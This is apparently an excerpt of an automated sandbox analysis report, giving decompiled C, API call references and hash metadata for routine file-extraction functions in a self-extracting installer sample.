                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttributesFileItemText
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                      • API String ID: 3625706803-3249786385
                                                                                                                                                                                                      • Opcode ID: ac61d37cc1e0ff7ef9fde262027b3d4c58c58da2173f50be7855dc6cafdbb582
                                                                                                                                                                                                      • Instruction ID: d4260747a30f17fb908bf107497f37d58fc50f3a3c76a05cfd586ac28385e51d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac61d37cc1e0ff7ef9fde262027b3d4c58c58da2173f50be7855dc6cafdbb582
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50414736A00201DBCB219F38DE44AF677B9FB4E700F144668E89297685DF32DE8AC750
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A64C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                      				struct _FILETIME _v12;
                                                                                                                                                                                                      				struct _FILETIME _v20;
                                                                                                                                                                                                      				FILETIME* _t14;
                                                                                                                                                                                                      				int _t15;
                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t21 = __ecx * 0x18;
                                                                                                                                                                                                      				if( *((intOrPtr*)(_t21 + 0xa68d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t14 =  &_v12;
                                                                                                                                                                                                      					_t15 = SetFileTime( *(_t21 + 0xa68d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      0x00a64c40
                                                                                                                                                                                                      0x00a64c4a
                                                                                                                                                                                                      0x00a64c8d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64c70
                                                                                                                                                                                                      0x00a64c70
                                                                                                                                                                                                      0x00a64c7e
                                                                                                                                                                                                      0x00a64c86
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64c8a

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00A64C54
                                                                                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A64C66
                                                                                                                                                                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A64C7E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Time$File$DateLocal
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2071732420-0
                                                                                                                                                                                                      • Opcode ID: 4f18307746697e6a47be308f1d231009a7855e347dc659af0e0d3888d436052d
                                                                                                                                                                                                      • Instruction ID: 6fec6ebc6c363d6ac96f7bb2633f5e3378cd8f3b15c76ece4d6210acc24e37d3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f18307746697e6a47be308f1d231009a7855e347dc659af0e0d3888d436052d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CDF0907260120CAFDB64DFB4CC48DBB7BBCEB18240B44062BE815D1150EA70D914CBB0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                      			E00A6487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                      				void* _t7;
                                                                                                                                                                                                      				CHAR* _t11;
                                                                                                                                                                                                      				long _t18;
                                                                                                                                                                                                      				long _t23;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t11 = __ecx;
                                                                                                                                                                                                      				asm("sbb edi, edi");
                                                                                                                                                                                                      				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                      				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                      					asm("sbb esi, esi");
                                                                                                                                                                                                      					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                      						asm("sbb esi, esi");
                                                                                                                                                                                                      						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t23 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                      				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                      					return _t7;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E00A6490C(_t11);
                                                                                                                                                                                                      					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}







                                                                                                                                                                                                      0x00a64880
                                                                                                                                                                                                      0x00a6488c
                                                                                                                                                                                                      0x00a64894
                                                                                                                                                                                                      0x00a648a0
                                                                                                                                                                                                      0x00a648c9
                                                                                                                                                                                                      0x00a648ce
                                                                                                                                                                                                      0x00a648a2
                                                                                                                                                                                                      0x00a648a8
                                                                                                                                                                                                      0x00a648b7
                                                                                                                                                                                                      0x00a648bc
                                                                                                                                                                                                      0x00a648aa
                                                                                                                                                                                                      0x00a648ac
                                                                                                                                                                                                      0x00a648ac
                                                                                                                                                                                                      0x00a648a8
                                                                                                                                                                                                      0x00a648de
                                                                                                                                                                                                      0x00a648e7
                                                                                                                                                                                                      0x00a6490b
                                                                                                                                                                                                      0x00a648ee
                                                                                                                                                                                                      0x00a648f0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64902

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00A64A23,?,00A64F67,*MEMCAB,00008000,00000180), ref: 00A648DE
                                                                                                                                                                                                      • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00A64F67,*MEMCAB,00008000,00000180), ref: 00A64902
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                      • Opcode ID: 9e24636df27940980c5e4af5113c31c5219afb476769fe699c6c46cdd4764161
                                                                                                                                                                                                      • Instruction ID: 24fa550d650e2d4043ab4cb235abc99380513a249dd553b47df85f7a312ed4b0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e24636df27940980c5e4af5113c31c5219afb476769fe699c6c46cdd4764161
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88014BA3E5157026F32481694C88FB7596CCBAAB34F1B0334FDAAE71D1D5644C0481E0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E00A64AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				int _t12;
                                                                                                                                                                                                      				signed int _t14;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				struct HWND__* _t21;
                                                                                                                                                                                                      				signed int _t24;
                                                                                                                                                                                                      				signed int _t25;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t20 =  *0xa6858c; // 0x268
                                                                                                                                                                                                      				_t9 = E00A63680(_t20);
                                                                                                                                                                                                      				if( *0xa691d8 == 0) {
                                                                                                                                                                                                      					_push(_t24);
                                                                                                                                                                                                      					_t12 = WriteFile( *(0xa68d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                      						_t25 = _a12;
                                                                                                                                                                                                      						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                      							_t14 =  *0xa69400; // 0x58b60
                                                                                                                                                                                                      							_t15 = _t14 + _t25;
                                                                                                                                                                                                      							 *0xa69400 = _t15;
                                                                                                                                                                                                      							if( *0xa68184 != 0) {
                                                                                                                                                                                                      								_t21 =  *0xa68584; // 0x0
                                                                                                                                                                                                      								if(_t21 != 0) {
                                                                                                                                                                                                      									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xa693f8, 0);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return _t25;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					return _t9 | 0xffffffff;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}











                                                                                                                                                                                                      0x00a64ad5
                                                                                                                                                                                                      0x00a64adb
                                                                                                                                                                                                      0x00a64ae7
                                                                                                                                                                                                      0x00a64aee
                                                                                                                                                                                                      0x00a64b05
                                                                                                                                                                                                      0x00a64b0d
                                                                                                                                                                                                      0x00a64b14
                                                                                                                                                                                                      0x00a64b1a
                                                                                                                                                                                                      0x00a64b1c
                                                                                                                                                                                                      0x00a64b21
                                                                                                                                                                                                      0x00a64b2a
                                                                                                                                                                                                      0x00a64b2f
                                                                                                                                                                                                      0x00a64b31
                                                                                                                                                                                                      0x00a64b39
                                                                                                                                                                                                      0x00a64b54
                                                                                                                                                                                                      0x00a64b54
                                                                                                                                                                                                      0x00a64b39
                                                                                                                                                                                                      0x00a64b2f
                                                                                                                                                                                                      0x00a64b0f
                                                                                                                                                                                                      0x00a64b0f
                                                                                                                                                                                                      0x00a64b0f
                                                                                                                                                                                                      0x00a64b5e
                                                                                                                                                                                                      0x00a64ae9
                                                                                                                                                                                                      0x00a64aed
                                                                                                                                                                                                      0x00a64aed

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00A63680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A6369F
                                                                                                                                                                                                        • Part of subcall function 00A63680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A636B2
                                                                                                                                                                                                        • Part of subcall function 00A63680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A636DA
                                                                                                                                                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00A64B05
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1084409-0
                                                                                                                                                                                                      • Opcode ID: 4bb7f10b6b1490443d3d352b7d50bf81d0859af5ff027e1c5dbbfe55754d2720
                                                                                                                                                                                                      • Instruction ID: db9e120a67dfbce059feb38d9f7ab1b7d21d6accc8c4362fa9872f009ce0fc74
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4bb7f10b6b1490443d3d352b7d50bf81d0859af5ff027e1c5dbbfe55754d2720
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2014071240215ABDB14CFA9DC15BA6777DA748725F148325FA39971E0CBB0D812CB50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A6658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                      				intOrPtr _t4;
                                                                                                                                                                                                      				char* _t6;
                                                                                                                                                                                                      				char* _t8;
                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				char* _t16;
                                                                                                                                                                                                      				intOrPtr* _t17;
                                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                                      				char* _t19;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t16 = __ecx;
                                                                                                                                                                                                      				_t10 = __edx;
                                                                                                                                                                                                      				_t17 = __ecx;
                                                                                                                                                                                                      				_t1 = _t17 + 1; // 0xa68b3f
                                                                                                                                                                                                      				_t12 = _t1;
                                                                                                                                                                                                      				do {
                                                                                                                                                                                                      					_t4 =  *_t17;
                                                                                                                                                                                                      					_t17 = _t17 + 1;
                                                                                                                                                                                                      				} while (_t4 != 0);
                                                                                                                                                                                                      				_t18 = _t17 - _t12;
                                                                                                                                                                                                      				_t2 = _t18 + 1; // 0xa68b40
                                                                                                                                                                                                      				if(_t2 < __edx) {
                                                                                                                                                                                                      					_t19 = _t18 + __ecx;
                                                                                                                                                                                                      					if(_t19 > __ecx) {
                                                                                                                                                                                                      						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                      						if( *_t8 != 0x5c) {
                                                                                                                                                                                                      							 *_t19 = 0x5c;
                                                                                                                                                                                                      							_t19 =  &(_t19[1]);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t6 = _a4;
                                                                                                                                                                                                      					 *_t19 = 0;
                                                                                                                                                                                                      					while( *_t6 == 0x20) {
                                                                                                                                                                                                      						_t6 = _t6 + 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return E00A616B3(_t16, _t10, _t6);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0x8007007a;
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      0x00a66592
                                                                                                                                                                                                      0x00a66594
                                                                                                                                                                                                      0x00a66596
                                                                                                                                                                                                      0x00a66598
                                                                                                                                                                                                      0x00a66598
                                                                                                                                                                                                      0x00a6659b
                                                                                                                                                                                                      0x00a6659b
                                                                                                                                                                                                      0x00a6659d
                                                                                                                                                                                                      0x00a6659e
                                                                                                                                                                                                      0x00a665a2
                                                                                                                                                                                                      0x00a665a4
                                                                                                                                                                                                      0x00a665a9
                                                                                                                                                                                                      0x00a665b2
                                                                                                                                                                                                      0x00a665b6
                                                                                                                                                                                                      0x00a665ba
                                                                                                                                                                                                      0x00a665c3
                                                                                                                                                                                                      0x00a665c5
                                                                                                                                                                                                      0x00a665c8
                                                                                                                                                                                                      0x00a665c8
                                                                                                                                                                                                      0x00a665c3
                                                                                                                                                                                                      0x00a665c9
                                                                                                                                                                                                      0x00a665cc
                                                                                                                                                                                                      0x00a665d2
                                                                                                                                                                                                      0x00a665d1
                                                                                                                                                                                                      0x00a665d1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a665dc
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharPrevA.USER32(00A68B3E,00A68B3F,00000001,00A68B3E,-00000003,?,00A660EC,00A61140,?), ref: 00A665BA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CharPrev
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 122130370-0
                                                                                                                                                                                                      • Opcode ID: e39cdb3925c8ef446ed25e435e41b91b8a0b964e9b8f654f1b13125cfa1019f3
                                                                                                                                                                                                      • Instruction ID: c9b47d1409b490e6859aaf97d808d88614ca6f50768d43ec351d0d8e684f1133
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e39cdb3925c8ef446ed25e435e41b91b8a0b964e9b8f654f1b13125cfa1019f3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22F04C721042509BD3314A1DD884B66BFFE9B86350F28026EE8DBC3205CA658C4683A4
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E00A6621E() {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				signed int _t5;
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                      				void* _t19;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t5 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      					0x4f0 = 2;
                                                                                                                                                                                                      					_t9 = E00A6597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E00A644B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                      					 *0xa69124 = E00A66285();
                                                                                                                                                                                                      					_t9 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                      			}











                                                                                                                                                                                                      0x00a66229
                                                                                                                                                                                                      0x00a66230
                                                                                                                                                                                                      0x00a66247
                                                                                                                                                                                                      0x00a6626a
                                                                                                                                                                                                      0x00a66272
                                                                                                                                                                                                      0x00a66249
                                                                                                                                                                                                      0x00a66255
                                                                                                                                                                                                      0x00a6625f
                                                                                                                                                                                                      0x00a66264
                                                                                                                                                                                                      0x00a66264
                                                                                                                                                                                                      0x00a66284

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00A6623F
                                                                                                                                                                                                        • Part of subcall function 00A644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A64518
                                                                                                                                                                                                        • Part of subcall function 00A644B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A64554
                                                                                                                                                                                                        • Part of subcall function 00A66285: GetLastError.KERNEL32(00A65BBC), ref: 00A66285
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 381621628-0
                                                                                                                                                                                                      • Opcode ID: a89eb2e8f6508256513fc62150c36589b9e6cb779806aa762cc2f5c1962d7fc2
                                                                                                                                                                                                      • Instruction ID: aa022a32181e28ca3fcb70760e2ad94df0e2d2833cfd1046b861333ca08e7733
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a89eb2e8f6508256513fc62150c36589b9e6cb779806aa762cc2f5c1962d7fc2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98F0E9B0B00208BBD750EB748E06FFE37BCDB54300F400469B986D7181DDB49D458650
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A64B60(signed int _a4) {
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t15 = _a4 * 0x18;
                                                                                                                                                                                                      				if( *((intOrPtr*)(_t15 + 0xa68d64)) != 1) {
                                                                                                                                                                                                      					_t9 = FindCloseChangeNotification( *(_t15 + 0xa68d74)); // executed
                                                                                                                                                                                                      					if(_t9 == 0) {
                                                                                                                                                                                                      						return _t9 | 0xffffffff;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *((intOrPtr*)(_t15 + 0xa68d60)) = 1;
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0xa68d60)) = 1;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0xa68d68)) = 0;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0xa68d70)) = 0;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0xa68d6c)) = 0;
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}





                                                                                                                                                                                                      0x00a64b66
                                                                                                                                                                                                      0x00a64b74
                                                                                                                                                                                                      0x00a64b98
                                                                                                                                                                                                      0x00a64ba0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64bac
                                                                                                                                                                                                      0x00a64ba4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64ba4
                                                                                                                                                                                                      0x00a64b78
                                                                                                                                                                                                      0x00a64b7e
                                                                                                                                                                                                      0x00a64b84
                                                                                                                                                                                                      0x00a64b8a
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00A64FA1,00000000), ref: 00A64B98
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2591292051-0
                                                                                                                                                                                                      • Opcode ID: 2eb88f1e3aab45b246792c378fb8caec57eceb1fb13772cfa56c4e0373bde1ea
                                                                                                                                                                                                      • Instruction ID: 7717e57501112d03684c0ff5c29d9aa131eefaa0dcdec1aafc2aefae1527d6b7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2eb88f1e3aab45b246792c378fb8caec57eceb1fb13772cfa56c4e0373bde1ea
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09F01231540B08DE5B71CF39CC00652BBFDEAA53A07100B2ED46ED2190DB34A481CBA0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A666AE(CHAR* __ecx) {
                                                                                                                                                                                                      				unsigned int _t1;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                      				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                      					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}




                                                                                                                                                                                                      0x00a666b1
                                                                                                                                                                                                      0x00a666ba
                                                                                                                                                                                                      0x00a666c7
                                                                                                                                                                                                      0x00a666bc
                                                                                                                                                                                                      0x00a666be
                                                                                                                                                                                                      0x00a666be

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,00A64777,?,00A64E38,?), ref: 00A666B1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
